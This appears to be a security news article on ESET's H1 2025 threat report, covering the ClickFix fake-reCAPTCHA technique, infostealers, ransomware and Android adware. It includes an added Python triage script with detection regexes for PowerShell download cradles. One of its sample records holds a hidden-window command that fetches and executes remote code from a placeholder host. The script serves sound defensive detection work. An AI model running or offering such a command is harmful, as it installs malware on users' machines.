ClickFix is increasingly used to install infostealers
Use of the attack vector grew by more than 500% over the past six months
Users are told to run commands in PowerShell to resolve a fake error
Use of the ClickFix attack vector has shot up by 517% since the second half of 2024, making it the second most abused attack vector behind phishing.
The attack uses a fake reCAPTCHA to trick users into running code in a PowerShell terminal as a 'fix' for a fabricated error.
This downloads and executes malware, typically infostealers, on the target device, which then harvest sensitive data and exfiltrate it back to the attackers.
Infostealers on the rise
ESET's H1 2025 Threat Report explains how ClickFix is abused by attackers to distribute some of the most prevalent infostealing malware, including Lumma Stealer, VidarStealer, StealC and Danabot.
The attack vector is so effective because it relies on very simple instructions to trick users into running commands they do not understand. Many users will simply not read, or not understand, the commands they run, focusing instead on making the error go away.
ClickFix is usually distributed via phishing emails leading the user to a fake site that requires a reCAPTCHA confirmation to access. PowerShell commands pasted and executed by the user often bypass antivirus software, making this a particularly effective way to compromise a device, especially when the attacker can get the user to run the command for them.
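Because the user launches the shell themselves, the telemetry a defender sees is a legitimate PowerShell process with a suspicious command line rather than a dropped binary. The following triage script is an added example, not code from ESET or from the article: it scores constructed process-creation records (Sysmon Event ID 1 style field names are assumed; the "not a robot" trailing comment is an assumed lure heuristic, and example.invalid is a placeholder host) and flags only launches that combine a user-driven parent, a download-and-execute cradle and a hidden window.

```python
"""Heuristic triage for ClickFix-style PowerShell launches.

Added example, not from the ESET report or the article. Field names
(Image, ParentImage, CommandLine, ProcessId) follow Sysmon Event ID 1 and
are an assumption; adapt them to your own telemetry.
"""
import re
from dataclasses import dataclass, field

# Indicators that together characterise a ClickFix paste: a user-driven
# shell (parent explorer.exe = Win+R / Start menu, or a terminal) running a
# one-liner that fetches and executes remote code with its window hidden.
DOWNLOAD_CRADLE = re.compile(
    r"(iex|invoke-expression|invoke-webrequest|iwr|irm|invoke-restmethod|"
    r"downloadstring|net\.webclient|-enc(odedcommand)?)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I)
# Assumed heuristic: ClickFix lures often append a reassuring comment so the
# pasted line looks like part of the "verification" step.
ROBOT_COMMENT = re.compile(r"#.*(not a robot|verification|captcha)", re.I)
USER_SHELL_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}


@dataclass
class Verdict:
    score: int
    reasons: list = field(default_factory=list)


def score_process(record: dict) -> Verdict:
    """Return a 0-4 score and the matched indicators for one process record."""
    image = record.get("Image", "").lower()
    parent = record.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = record.get("CommandLine", "")
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return Verdict(0)
    reasons = []
    if parent in USER_SHELL_PARENTS:
        reasons.append(f"user-launched shell (parent {parent})")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download-and-execute cradle")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    if ROBOT_COMMENT.search(cmd):
        reasons.append("captcha-style trailing comment")
    return Verdict(len(reasons), reasons)


def triage(records, threshold: int = 3):
    """Return (ProcessId, Verdict) for every record at or above the threshold."""
    hits = []
    for rec in records:
        verdict = score_process(rec)
        if verdict.score >= threshold:
            hits.append((rec["ProcessId"], verdict))
    return hits


# Constructed sample records: one admin script, one ClickFix paste, one
# scheduled task and one developer download that must not be flagged.
SAMPLE_RECORDS = [
    {"ProcessId": 2210, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ProcessId": 4812, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (irm http://example.invalid/v.txt)" # I am not a robot'},
    {"ProcessId": 5190, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ProgramData\\update.ps1"},
    {"ProcessId": 6023, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "ParentImage": "C:\\Program Files\\WindowsApps\\WindowsTerminal.exe",
     "CommandLine": 'pwsh.exe -c "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"'},
]

if __name__ == "__main__":
    for pid, verdict in triage(SAMPLE_RECORDS):
        print(pid, verdict.score, "; ".join(verdict.reasons))
```

The threshold is deliberately set so that a single indicator (an admin running a script from cmd.exe, or a developer fetching a file from a terminal) scores too low to alert; tune the parent list and cradle patterns to what your own environment legitimately runs.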
In other infostealer news, ESET's threat report shows that SnakeStealer has overtaken Agent Tesla as the most detected infostealer. SnakeStealer was spotted in a massive campaign that targeted hundreds of US and EU companies to steal credentials.
Ransomware gangs experienced an unexpectedly stormy period thanks to attacks and rivalries between different ransomware outfits. The DragonForce group launched a spree of defacement campaigns against some of the most notorious ransomware groups, including BlackLock, Mamona and ransomware-as-a-service giant RansomHub.
While there have been significant law enforcement operations against ransomware groups in the last several months, including the operation against 8Base, it seems that rival gangs have caused the most damage to the ransomware ecosystem.
On the mobile front, the recent wave of Kaleidoscope infections has pushed Android adware detections up by 160%. Malware distributed through official app stores is nothing new, with the recent SparkKitty malware distributed through both the Apple App Store and the Google Play Store.
However, Kaleidoscope used a two-pronged approach: a seemingly benign app on the official store paired with a malicious twin app downloaded via third-party app stores, which runs intrusive ads on the infected device to generate advertising revenue.
"From novel social engineering techniques to sophisticated mobile threats and major infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring," said Jiří Kropáč, ESET Director of Threat Prevention Labs.